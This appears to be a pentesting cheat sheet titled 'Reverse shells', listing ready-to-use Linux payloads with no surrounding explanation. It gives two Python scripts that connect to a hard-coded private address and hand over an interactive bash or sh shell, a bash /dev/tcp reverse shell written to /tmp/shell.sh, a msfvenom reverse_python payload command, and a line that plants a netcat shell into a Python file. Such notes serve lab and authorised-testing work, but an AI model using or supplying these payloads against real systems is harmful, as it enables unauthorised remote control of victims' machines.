Reverse shells
Linux Reverse shell
Python
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.119.212",6666))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])
or
import socket,subprocess
import pty,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.119.212",6666))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
pty.spawn("/bin/sh")
echo 'bash -c "bash -i >& /dev/tcp/192.168.119.146/4444 0>&1"' > /tmp/shell.sh
chmod +x /tmp/shell.sh
msfvenom -p cmd/unix/reverse_python lhost=10.10.16.1 lport=9999 R
echo "import os; gori='nc 10.10.10.01. 8888 -e /bin/bash'; os.system(gori)" > vulnerablefile.py
Last modified 1yr ago